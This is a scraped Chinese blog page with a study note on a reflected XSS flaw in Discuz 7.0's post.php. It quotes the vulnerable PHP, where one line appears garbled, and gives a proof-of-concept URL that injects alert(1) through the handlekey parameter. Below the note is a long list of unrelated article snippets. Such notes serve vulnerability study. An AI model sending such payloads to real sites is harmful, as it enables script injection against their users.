小龙在山东
小龙在山东

discuz7.0 _post.php xss跨站漏洞-学习笔记

漏洞名称

discuz7.0 _post.php xss跨站漏洞

发布时间

2014-06-02

漏洞分类

反射型xss漏洞

缺陷代码

没有对所有参数进行过滤。

if($action == 'reply') {
    $addfeedcheck = $customaddfeed & 4 ? 'checked="checked"': '';
} elseif(!empty($special) && $action != 'reply') {
    $addfeedcheck = $customaddfeed & 2 ? 'checked="checked"': '';
} else {
    $addfeedcheck = $customaddfeed & 1 ? 'checked="checked"': '';
}


$navigation = $navtitle = $thread = '';
if(!empty($cedit)) {
    unset($inajax, $infloat, $ajaxtarget, $handlekey);
}

if($action == 'edit' || $action == 'reply') {

    if($thread = $db->fetch_first("SELECT * FROM {$tablepre}threads WHERE tid='$tid'".($auditstatuson ? '' : " AND displayorder>='0'"))) {

        $navigation = $tid\">$thread[subject]";
        $navtitle = $thread['subject'].' - ';
        if($thread['readperm'] && $thread['readperm'] > $readaccess && !$forum['ismoderator'] && $thread['authorid'] != $discuz_uid) {
            showmessage('thread_nopermission', NULL, 'NOPERM');
        }

        $fid = $thread['fid'];
        $special = $thread['special'];

    } else {
        showmessage('thread_nonexistence');
    }
    
    if($action == 'reply' && ($thread['closed'] == 1) && !$forum['ismoderator']) {
        showmessage('post_thread_closed');
    }

}
?>

实验步骤

打开目标站点,在url后加入如下poc:/post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,alert(1)

discuz7.0 _post.php xss跨站漏洞-学习笔记_第1张图片

你可能感兴趣的:(安全实践)

  • 利用图数据库构建问答应用指南 scaFHIO 数据库oraclepython
    在本指南中,我们将逐步介绍如何在图数据库上创建问答链。这些系统可以让我们针对图数据库中的数据提出问题,并返回自然语言的答案。⚠️安全提示⚠️构建基于图数据库的问答系统需要执行模型生成的图查询。这其中存在固有风险。确保数据库连接权限范围尽可能地缩小以满足链/代理的需求。这将减轻但不会消除构建模型驱动系统的风险。更多安全实践的信息,请查看这里。架构在高层次上,大多数图链的步骤为:将问题转换为图数据库查
  • 人工智能算法安全优化实践路径 智能计算研究中心 其他
    内容概要在人工智能技术深度融入产业实践的进程中,算法安全优化已成为保障系统可靠性与社会信任的核心命题。本文系统性梳理从数据预处理到模型落地的全流程安全实践路径,聚焦金融风控、医疗影像诊断、自动驾驶等关键场景,揭示算法开发中潜藏的伦理风险与技术挑战。通过整合自动化机器学习与联邦学习技术,构建跨数据孤岛的协作框架,同时引入可解释性算法增强模型透明度,确保决策逻辑可追溯、可验证。在模型优化维度,重点解析
  • AI安全助手 ︳灵脉AI开发安全卫士在代码阶段护航开发安全 DevSecOps选型指南 人工智能AI安全助手开发安全助手软件供应链安全
    在当今快节奏的开发环境当中,兼顾快速的发布周期和稳健的安全实践,是一项艰巨的任务。灵脉AI开发安全卫士将是用户在静态应用安全测试(SAST)领域的AI新盟友。灵脉AI开发安全卫士旨在为用户提供与代码安全专家能力相当、智能好用的AI开发安全助手,真正实现安全左移、降低软件风险及缺陷修复成本,提升企业代码安全治理能力。灵脉AI开发安全卫士功能一览:灵脉AI开发安全卫士优势一览:误报、漏报消减:深入理解
  • JavaScript系列(69)--安全编程技术详解 ᅟᅠ        ‌‍‎‏ 一进制 JavaScriptjavascript安全开发语言
    JavaScript安全编程技术详解今天,让我们深入探讨JavaScript的安全编程技术。在当今的Web开发中,安全性已经成为一个至关重要的话题,掌握安全编程技术对于构建可靠的应用系统至关重要。安全编程基础概念小知识:JavaScript安全编程涉及多个方面,包括输入验证、XSS防护、CSRF防护、安全的数据存储等。采用正确的安全实践可以有效防止大多数常见的安全漏洞。基本安全实现//1.输入验证
  • Java API接口设计的安全实践:从零开始深度解析 墨瑾轩 一起学学Java【一】java安全开发语言
    第1章:基础概念与原则1.1API接口定义API(ApplicationProgrammingInterface)是一组预定义的方法和规则,允许不同的软件组件之间进行交互。在Java中,通常通过定义类、接口和方法来构建API。安全的API设计旨在确保接口在被外部调用时,既能满足功能需求,又能防止潜在的安全威胁。1.2安全设计原则最小权限原则:仅暴露必要的功能,隐藏敏感信息和内部实现细节。输入验证:
  • AI Agent的安全实践:权限控制与数据保护 技术出海录 人工智能AIaiagent
    在前面的文章中,我们讨论了AIAgent的各个功能模块。今天,我想聊聊一个经常被忽视但极其重要的话题:安全性。说实话,我在这方面也吃过亏,希望通过分享我的经验,帮大家少走一些弯路。从一个安全事故说起还记得去年我们刚上线AI助手时发生的一件事:用户:帮我查一下张三的工资信息助手:好的,张三的月薪是20000元,上个月发放了年终奖50000元...用户:...(这是个普通用户,不应该有权限查看这些信息
  • Electron 开发者的 Tauri 2.0 实战指南:安全实践 技术出海录 人工智能前端React
    在桌面应用开发中,安全性至关重要。相比Electron,Tauri2.0提供了更严格的安全模型和更完善的权限系统。本文将帮助你理解和实践Tauri的安全特性。权限系统对比Electron的安全模型在Electron中,我们通常这样处理安全://main.jsconst{app,BrowserWindow}=require('electron')functioncreateWindow(){cons
  • WebSocket 安全实践:从认证到加密
    在前三篇文章中,我们深入探讨了WebSocket的基础原理、服务端开发和客户端实现。今天,让我们把重点放在安全性上,看看如何构建一个安全可靠的WebSocket应用。我曾在一个金融项目中,通过实施多层安全机制,成功防御了多次恶意攻击尝试。安全挑战WebSocket应用面临的主要安全挑战包括:身份认证数据加密跨站点WebSocket劫持(CSWSH)拒绝服务攻击(DoS)中间人攻击让我们逐一解决这些
  • Electron 开发者的 Tauri 2.0 实战指南:安全实践
    在桌面应用开发中,安全性至关重要。相比Electron,Tauri2.0提供了更严格的安全模型和更完善的权限系统。本文将帮助你理解和实践Tauri的安全特性。权限系统对比Electron的安全模型在Electron中,我们通常这样处理安全://main.jsconst{app,BrowserWindow}=require('electron')functioncreateWindow(){cons
  • Java Web安全与Spring Config对象实战 福建低调
    本文还有配套的精品资源,点击获取简介:本课程深入探讨JavaWeb开发中的安全实践,包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时,介绍SpringSecurity框架的应用,以及Config对象在Spring配置管理中的作用,包括依赖注入和外部化配置。课程还包括实战演练,通过设置安全环境和安全漏洞模拟,帮助开发者提升应用的安全性和故障排查能力。1.Web安全
  • DevOps安全性的重要性体现在哪? weixin_54503231 devops运维
    DevOps的安全性,也称为DevSecOps,是DevOps领域中的一个重要方面,它强调将安全实践集成到DevOps流程中,以提高代码发布的质量和速度,并降低安全漏洞的风险。DevOps安全性的重要性:提高代码质量和速度:通过将安全实践集成到开发和运营流程的各个方面,可以确保在快速迭代和发布的同时,保持代码的高质量。降低安全漏洞风险:通过持续的安全监测和评估,可以及时发现并修复潜在的安全漏洞,从
  • 中科大郑烇、杨坚《计算机网络》课程 第八章笔记 「已注销」 中科大郑烇杨坚《计算机网络》课程网络网络协议
    计算机网络第八章第8章网络安全本章目标:网络安全原理:加密,不仅仅用于机密性认证报文完整性密钥分发安全实践:防火墙各个层次的安全性:应用层,传输层,网络层和链路层8.1什么是网络安全?机密性:只有发送方和预订的接收方能否理解传输的报文内容发送方加密报文接收方解密报文认证:发送方和接收方需要确认对方的身份报文完整性:发送方、接受方需要确认报文在传输的过程中或者事后没有被改变访问控制和服务的可用性:服
  • 企业安全漏洞一览:七大隐患及其防范措施 知白守黑V 风险评估安全运营安全漏洞web安全网络安全风险评估安全运营安全态势漏洞预警安全意识
    网络安全是一场跌宕起伏,永无止境的拉锯战。攻击者的技术和手法不断花样翻新,主打一个“避实就虚”和“出奇制胜”;防御者的策略则强调“求之于势,不责于人”,依靠整体安全态势和风险策略的成熟度和韧性来化解风险。此外,经常被忽视的一点是,基础安全策略和实践同样重要。根据微软2023年数字防御风险报告,良好的基础安全实践可以防御99%的网络攻击。例如,漏洞管理、安全意识培训以及定期的安全评估工作。本文我们将
  • DevOps 团队应该了解的 5 个安全威胁 优维科技EasyOps 安全devops网络
    DevOps安全性,也称为DevSecOps,是一种将安全实践集成到DevOps流程中的理念。DevOps安全涉及通过发布工程师和安全团队之间持续、灵活的协作来创建“安全即代码”文化。DevSecOps运动与DevOps本身非常相似,专注于在敏捷框架内为复杂的软件开发流程创建新的解决方案。DevOps安全性在于打破孤岛并促进跨团队的开放式协作。它是为了让每个人都对安全负责,最终目标是提高代码发布的
  • Spring Boot项目Jar包加密:防止反编译的安全实践 IT·陈寒 SpringBoot框架学习微服务架构设计Java面试技巧springbootjar安全
    文章目录1.引言2.背景3.Jar包加密方案3.1使用Java混淆工具3.2使用Jar包加密工具3.2.1示例:使用JCryptor对Jar包进行加密4.加密后的Jar包的运行5.安全性与性能考虑5.1安全性考虑5.2性能考虑6.拓展功能与未来展望6.1数字签名与验签6.2使用加密算法库7.结语SpringBoot项目Jar包加密:防止反编译的安全实践☆*o(≧▽≦)o*☆嗨~我是IT·陈寒✨博客
  • 安全合规之漏洞扫描的重要意义 德迅云安全-小潘 安全网络web安全
    随着信息技术的飞速发展,企业在日常运营中越来越依赖于网络和数字化系统。然而,随之而来的是网络安全威胁的不断增加,给企业的数据和运营带来了巨大的风险。为了保护企业的资产和数据,企业需要积极采取措施来确保网络的安全性和合规性。其中,漏洞扫描是一项关键的安全实践,可以帮助企业发现和修复系统中的漏洞,满足安全合规要求。一、漏洞扫描的定义和作用漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计
  • 喜讯!美创和大数据局用户的数据安全实践被“北大”录取 数据库安全 大数据
    近日,宁波市镇海区大数据发展管理中心与美创科技联合申报的“数据安全运营中心建设项目”经过多轮专家评审,入选“北京大学数字政府与数字治理案例集”,并收录于《北大公共治理案例库》!“北京大学数字政府与数字治理案例征集活动”由北京大学政府管理学院和北京大学公共治理研究所共同发起,旨在促进数字政府领域的研究和实践,为学术研究、教学和政策分析提供集中的案例资源,支持领域专家、学者和实践者之间的交流与合作。此
  • CISSP-D7-运营安全 sinat_34066134 安全网络安全信息安全
    CISSP-D1-安全与风险管理CISSP-D2-资产安全CISSP-D3-安全架构与工程CISSP-D4-通讯与网络安全CISSP-D5-身份与访问控制CISSP-D6-安全评估和测试D7:运营安全一、运营安全概述:D7-1~3二、操作安全实践:D7-4~6三、灾难备份与恢复:D7-7~9D7-1-安全事件调查和取证1、计算机犯罪行为犯罪中的动机、机会和方式(motive、opportunity
  • 2023年国家基地“楚慧杯”网络空间安全实践能力竞赛 Wp 一点WP Fab1an CTF笔记安全
    MISC参考文章:天权信安“”2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUpez-zip使用脚本解套娃压缩包importioimportzipfilewithopen("4096.zip","rb")asf:data=f.read()info="666"whileTrue:withzipfile.ZipFile(io.BytesIO(data),"r")aszf:all_fil
  • 基线检查和基线含义 什么都好奇 网络tcp/ip服务器
    一、什么是基线基线指操作系统、数据库及中间件的安全实践及合规检查的配置红线,包括弱口令、账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置检查。二、安全基线与配置核查安全基线:是保持信息系统安全的机密性、完整性、可用性的最小安全控制,是系统的最小安全保证,最基本的安全要求。配置核查:是业务系统及所属设备在特定时期内,根据自身需求、部署环境和承载业务要求应满足的基本安全配置要求合集
  • DevSecOps 工具:初学者指南 网络研究院 网络研究院应用程序测试软件安全开发
    DevSecOps是开发、安全和运营的融合,标志着软件开发的范式转变,在整个软件开发生命周期(SDLC)中无缝集成安全性。这种方法标志着不再将安全视为开发过程中的一个阶段。除了DevSecOps的核心原则和最佳实践之外,特定工具也是实施和强化安全实践的关键推动者。随着组织采用DevSecOps策略,支持这些计划的工具的种类和数量自然也随之激增。这篇博文深入研究了DevSecOps工具的几个不同类别
  • JSON安全性 未来bbaa json
    确保JSON处理的安全性是现代Web开发中重要的一环。以下是一些关键的安全实践,用于防止JSON注入攻击以及确保数据在传输过程中的安全性:1.**验证和清洗输入:**-在将任何数据写入数据库之前,请确保验证用户输入。对于期望的JSON结构,验证字段类型和数据格式。-使用库函数对输入数据进行清洗,以避免跨站脚本攻击(XSS)和SQL注入等攻击。2.**使用安全的反序列化方法:**-避免使用不安全的编
  • SSL证书申请与部署指南 JoySSL230907 ssl网络协议网络httpshttp
    随着网络安全的日益重要,使用SSL证书来保护网站和用户数据已经成为一项基本的安全实践。本文将为您提供一份清晰的SSL证书申请与部署指南,确保您的网站在传输敏感信息时能够提供安全的加密保护。第一部分:SSL证书申请步骤一:选择SSL证书类型1.单域名证书:适用于单个域名。2.多域名证书:支持多个域名,常用于多个子域名或不同域名的保护。3.通配符证书:适用于主域名及其所有子域名。步骤二:选择SSL证书
  • 喜讯!云起无垠斩获“东升杯”国际创业大赛“优秀奖” 云起无垠 荣誉成就人工智能创业创新
    2023年第十一届“东升杯”国际创业大赛完美落下帷幕,本次大赛历经五个月的时间,在经历了50余场的激烈争夺后,最终在全球范围内评选出了Top60获奖项目。其中,新一代AI赋能软件供应链安全实践者——云起无垠凭借其优秀的科技创新实力和独特的业务理念,在众多参赛企业中脱颖而出,获得了本次大赛的优秀奖荣誉。“东升杯”国际创业大赛是由北京市人力资源和社会保障局、北京市科学技术委员会、中关村科技园区管理委员
  • JWT 单点登录探析:原理、用途与安全实践 沉梦听雨. 系统设计安全jwt
    JWT单点登录探析:原理、用途与安全实践什么是JWT?JWT(JSONWebToken)是目前最流行的跨域认证解决方案,是一种基于Token的认证授权机制。从JWT的全称可以看出,JWT本身也是Token,一种规范化之后的JSON结构的Token。通过数字签名的方式,以JSON对象为载体,在不同的服务终端之间安全的传输信息。JWT自身包含了身份验证所需要的所有信息,因此,我们的服务器不需要存储Se
  • 交通安全在整治 平安出行在贵州系列报道之六十五 不死冥王
    “交通助我前行安全护我成长”贵州省首个省级青少年交通安全实践基地正式启动开营为进一步推进全省交通安全文化阵地建设,努力营造安全、有序、畅通、和谐的道路交通环境,不断提升新时代青少年交通安全自我保护能力,2019年5月16日,由团省委、省公安厅交通管理局联合共建的贵州省青少年交通安全实践基地在贵阳市花溪区全国青少年贵州活动营地正式启动开营。这也是目前建成投入使用的贵州省首个中小学生道路交通安全实践基
  • 什么是Web 应用程序渗透测试? 蹦极的考拉 web安全安全网络安全web渗透测试渗透工程师
    Web应用程序渗透测试,也称为Web渗透测试或简称Web应用程序渗透测试,是一种涉及评估Web应用程序和网站安全性的网络安全实践。这是一种主动识别恶意攻击者可能利用的漏洞和弱点的方法。–Web应用程序安全评估Web渗透测试的目标是模拟对Web应用程序的真实攻击,以便在黑客利用安全漏洞之前发现它们。通过进行渗透测试,组织可以评估其安全措施的有效性,发现潜在的漏洞,并实施适当的安全措施来保护其Web应
  • 2023年国家基地“楚慧杯”网络空间安全实践能力竞赛 Web方向 题解wp Jay 17 CTF赛事PHPSQL注入反序列化Web安全CTF安全
    前言:三小时的比赛,和强网同时结束还要当场交wp,汗流浃背,烧起来了啊啊啊啊~eaaeval目录扫出备份文件源码如下a='admin';$this->b='admin';}publicfunction__destruct(){if(!preg_match("/flag|system|php|cat|tac|shell|sort/i",$this->a)&&!preg_match("/flag|sy
  • sql联合注入--Head传参 等黄昏等你来 网安网络安全sqlmysql
    未知攻,何知守。进行网络安全实践操作时,必须遵守网络安全法。网络安全法全文(必看)https://zhuanlan.zhihu.com/p/27336286为什么要学习网络安全:网络安全已经成为各国关注的焦点,不仅关系到机构和个人用户的信息资源和资产风险,也关系到国家安全和社会稳定。进入21世纪,随着信息化建设和IT技术的快速发展,各种网络技术的应用更加广泛深入,同时出现很多网络安全问题,致使网络
  • Gartner发布2024年及以后中国网络安全的七大主要趋势 galaxylove web安全安全
    网络安全实践方式、组织结构、技术本地化和法规是塑造和放大中国网络安全趋势的因素。我们重点介绍将影响中国首席信息官及其安全团队的战略和投资的七个关键趋势。以业务为中心的安全投资、暴露面管理、零信任、平台整合、身份优先、网络弹性、网络判断机会对改善网络安全流程、技能和技术的投资仍然是中国首席信息官和其他安全领导者的重点关注点。强调对这项投资的衡量,并将其价值融入为业务领导者设计的叙述中,可以显着提高这
  • 解线性方程组 qiuwanchi
    package gaodai.matrix; import java.util.ArrayList; import java.util.List; import java.util.Scanner; public class Test { public static void main(String[] args) { Scanner scanner = new Sc
  • 在mysql内部存储代码 annan211 性能mysql存储过程触发器
    在mysql内部存储代码 在mysql内部存储代码,既有优点也有缺点,而且有人倡导有人反对。 先看优点: 1 她在服务器内部执行,离数据最近,另外在服务器上执行还可以节省带宽和网络延迟。 2 这是一种代码重用。可以方便的统一业务规则,保证某些行为的一致性,所以也可以提供一定的安全性。 3 可以简化代码的维护和版本更新。 4 可以帮助提升安全,比如提供更细
  • Android使用Asynchronous Http Client完成登录保存cookie的问题 hotsunshine android
    Asynchronous Http Client是android中非常好的异步请求工具 除了异步之外还有很多封装比如json的处理,cookie的处理 引用 Persistent Cookie Storage with PersistentCookieStore This library also includes a PersistentCookieStore whi
  • java面试题 Array_06 java面试
    java面试题 第一,谈谈final, finally, finalize的区别。 final-修饰符(关键字)如果一个类被声明为final,意味着它不能再派生出新的子类,不能作为父类被继承。因此一个类不能既被声明为 abstract的,又被声明为final的。将变量或方法声明为final,可以保证它们在使用中不被改变。被声明为final的变量必须在声明时给定初值,而在以后的引用中只能
  • 网站加速 oloz 网站加速
    前序:本人菜鸟,此文研究总结来源于互联网上的资料,大牛请勿喷!本人虚心学习,多指教. 1、减小网页体积的大小,尽量采用div+css模式,尽量避免复杂的页面结构,能简约就简约。 2、采用Gzip对网页进行压缩;    GZIP最早由Jean-loup Gailly和Mark Adler创建,用于UNⅨ系统的文件压缩。我们在Linux中经常会用到后缀为.gz
  • 正确书写单例模式 随意而生 java 设计模式 单例
      单例模式算是设计模式中最容易理解,也是最容易手写代码的模式了吧。但是其中的坑却不少,所以也常作为面试题来考。本文主要对几种单例写法的整理,并分析其优缺点。很多都是一些老生常谈的问题,但如果你不知道如何创建一个线程安全的单例,不知道什么是双检锁,那这篇文章可能会帮助到你。   懒汉式,线程不安全   当被问到要实现一个单例模式时,很多人的第一反应是写出如下的代码,包括教科书上也是这样
  • 单例模式 香水浓 java
    懒汉  调用getInstance方法时实例化 public class Singleton { private static Singleton instance; private Singleton() {} public static synchronized Singleton getInstance() { if(null == ins
  • 安装Apache问题:系统找不到指定的文件 No installed service named "Apache2" AdyZhang apachehttp server
    安装Apache问题:系统找不到指定的文件 No installed service named "Apache2" 每次到这一步都很小心防它的端口冲突问题,结果,特意留出来的80端口就是不能用,烦。 解决方法确保几处: 1、停止IIS启动 2、把端口80改成其它 (譬如90,800,,,什么数字都好) 3、防火墙(关掉试试) 在运行处输入 cmd 回车,转到apa
  • 如何在android 文件选择器中选择多个图片或者视频? aijuans android
    我的android app有这样的需求,在进行照片和视频上传的时候,需要一次性的从照片/视频库选择多条进行上传 但是android原生态的sdk中,只能一个一个的进行选择和上传。 我想知道是否有其他的android上传库可以解决这个问题,提供一个多选的功能,可以使checkbox之类的,一次选择多个 处理方法 官方的图片选择器(但是不支持所有版本的androi,只支持API Level
  • mysql中查询生日提醒的日期相关的sql baalwolf mysql
    SELECT sysid,user_name,birthday,listid,userhead_50,CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')),CURDATE(),  dayofyear( CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')))-dayofyear(
  • MongoDB索引文件破坏后导致查询错误的问题 BigBird2012 mongodb
    问题描述: MongoDB在非正常情况下关闭时,可能会导致索引文件破坏,造成数据在更新时没有反映到索引上。 解决方案:   使用脚本,重建MongoDB所有表的索引。 var names = db.getCollectionNames(); for( var i in names ){ var name = names[i]; print(name);
  • Javascript Promise bijian1013 JavaScriptPromise
            Parse JavaScript SDK现在提供了支持大多数异步方法的兼容jquery的Promises模式,那么这意味着什么呢,读完下文你就了解了。 一.认识Promises         “Promises”代表着在javascript程序里下一个伟大的范式,但是理解他们为什么如此伟大不是件简
  • [Zookeeper学习笔记九]Zookeeper源代码分析之Zookeeper构造过程 bit1129 zookeeper
       Zookeeper重载了几个构造函数,其中构造者可以提供参数最多,可定制性最多的构造函数是     public ZooKeeper(String connectString, int sessionTimeout, Watcher watcher, long sessionId, byte[] sessionPasswd, boolea
  • 【Java命令三】jstack bit1129 jstack
    jstack是用于获得当前运行的Java程序所有的线程的运行情况(thread dump),不同于jmap用于获得memory dump   [hadoop@hadoop sbin]$ jstack Usage: jstack [-l] <pid> (to connect to running process) jstack -F
  • jboss 5.1启停脚本 动静分离部署 ronin47
    以前启动jboss,往各种xml配置文件,现只要运行一句脚本即可。start nohup sh /**/run.sh -c servicename  -b ip -g  clustername   -u broatcast jboss.messaging.ServerPeerID=int  -Djboss.service.binding.set=p
  • UI之如何打磨设计能力? brotherlamp UIui教程ui自学ui资料ui视频
      在越来越拥挤的初创企业世界里,视觉设计的重要性往往可以与杀手级用户体验比肩。在许多情况下,尤其对于 Web 初创企业而言,这两者都是不可或缺的。前不久我们在《右脑革命:别学编程了,学艺术吧》中也曾发出过重视设计的呼吁。如何才能提高初创企业的设计能力呢?以下是 9 位创始人的体会。 1.找到自己的方式 如果你是设计师,要想提高技能可以去设计博客和展示好设计的网站如D-lists或
  • 三色旗算法 bylijinnan java算法
    import java.util.Arrays; /** 问题: 假设有一条绳子,上面有红、白、蓝三种颜色的旗子,起初绳子上的旗子颜色并没有顺序, 您希望将之分类,并排列为蓝、白、红的顺序,要如何移动次数才会最少,注意您只能在绳 子上进行这个动作,而且一次只能调换两个旗子。 网上的解法大多类似: 在一条绳子上移动,在程式中也就意味只能使用一个阵列,而不使用其它的阵列来
  • 警告:No configuration found for the specified action: \'s chiangfai configuration
    1.index.jsp页面form标签未指定namespace属性。 <!--index.jsp代码--> <%@taglib prefix="s" uri="/struts-tags"%> ... <s:form action="submit" method="post"&g
  • redis -- hash_max_zipmap_entries设置过大有问题 chenchao051 redishash
    使用redis时为了使用hash追求更高的内存使用率,我们一般都用hash结构,并且有时候会把hash_max_zipmap_entries这个值设置的很大,很多资料也推荐设置到1000,默认设置为了512,但是这里有个坑   #define ZIPMAP_BIGLEN 254 #define ZIPMAP_END 255     /* Return th
  • select into outfile access deny问题 daizj mysqltxt导出数据到文件
    本文转自:http://hatemysql.com/2010/06/29/select-into-outfile-access-deny%E9%97%AE%E9%A2%98/ 为应用建立了rnd的帐号,专门为他们查询线上数据库用的,当然,只有他们上了生产网络以后才能连上数据库,安全方面我们还是很注意的,呵呵。 授权的语句如下: grant select on armory.* to rn
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('This example should only be run from a Web Brows
  • 美国电影超短200句 dcj3sjt126com 电影
    1. I see. 我明白了。2. I quit! 我不干了!3. Let go! 放手!4. Me too. 我也是。5. My god! 天哪!6. No way! 不行!7. Come on. 来吧(赶快)8. Hold on. 等一等。9. I agree。 我同意。10. Not bad. 还不错。11. Not yet. 还没。12. See you. 再见。13. Shut up!
  • Java访问远程服务 dyy_gusi httpclientwebservicegetpost
        随着webService的崛起,我们开始中会越来越多的使用到访问远程webService服务。当然对于不同的webService框架一般都有自己的client包供使用,但是如果使用webService框架自己的client包,那么必然需要在自己的代码中引入它的包,如果同时调运了多个不同框架的webService,那么就需要同时引入多个不同的clien
  • Maven的settings.xml配置 geeksun settings.xml
    settings.xml是Maven的配置文件,下面解释一下其中的配置含义: settings.xml存在于两个地方: 1.安装的地方:$M2_HOME/conf/settings.xml 2.用户的目录:${user.home}/.m2/settings.xml 前者又被叫做全局配置,后者被称为用户配置。如果两者都存在,它们的内容将被合并,并且用户范围的settings.xml优先。
  • ubuntu的init与系统服务设置 hongtoushizi ubuntu
    转载自:  http://iysm.net/?p=178 init Init是位于/sbin/init的一个程序,它是在linux下,在系统启动过程中,初始化所有的设备驱动程序和数据结构等之后,由内核启动的一个用户级程序,并由此init程序进而完成系统的启动过程。 ubuntu与传统的linux略有不同,使用upstart完成系统的启动,但表面上仍维持init程序的形式。 运行
  • 跟我学Nginx+Lua开发目录贴 jinnianshilongnian nginxlua
    使用Nginx+Lua开发近一年的时间,学习和实践了一些Nginx+Lua开发的架构,为了让更多人使用Nginx+Lua架构开发,利用春节期间总结了一份基本的学习教程,希望对大家有用。也欢迎谈探讨学习一些经验。    目录 第一章 安装Nginx+Lua开发环境 第二章 Nginx+Lua开发入门 第三章 Redis/SSDB+Twemproxy安装与使用 第四章 L
  • php位运算符注意事项 home198979 位运算PHP&
    $a = $b = $c = 0; $a & $b = 1; $b | $c = 1  问a,b,c最终为多少?   当看到这题时,我犯了一个低级错误,误 以为位运算符会改变变量的值。所以得出结果是1 1 0 但是位运算符是不会改变变量的值的,例如: $a=1;$b=2; $a&$b;  这样a,b的值不会有任何改变
  • Linux shell数组建立和使用技巧 pda158 linux
    1.数组定义   [chengmo@centos5 ~]$ a=(1 2 3 4 5)   [chengmo@centos5 ~]$ echo $a   1   一对括号表示是数组,数组元素用“空格”符号分割开。    2.数组读取与赋值   得到长度:   [chengmo@centos5 ~]$ echo ${#a[@]}   5   用${#数组名[@或
  • hotspot源码(JDK7) ol_beta javaHotSpotjvm
    源码结构图,方便理解:   ├─agent                            Serviceab
  • Oracle基本事务和ForAll执行批量DML练习 vipbooks oraclesql
    基本事务的使用: 从账户一的余额中转100到账户二的余额中去,如果账户二不存在或账户一中的余额不足100则整笔交易回滚 select * from account; -- 创建一张账户表 create table account( -- 账户ID id number(3) not null, -- 账户名称 nam
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他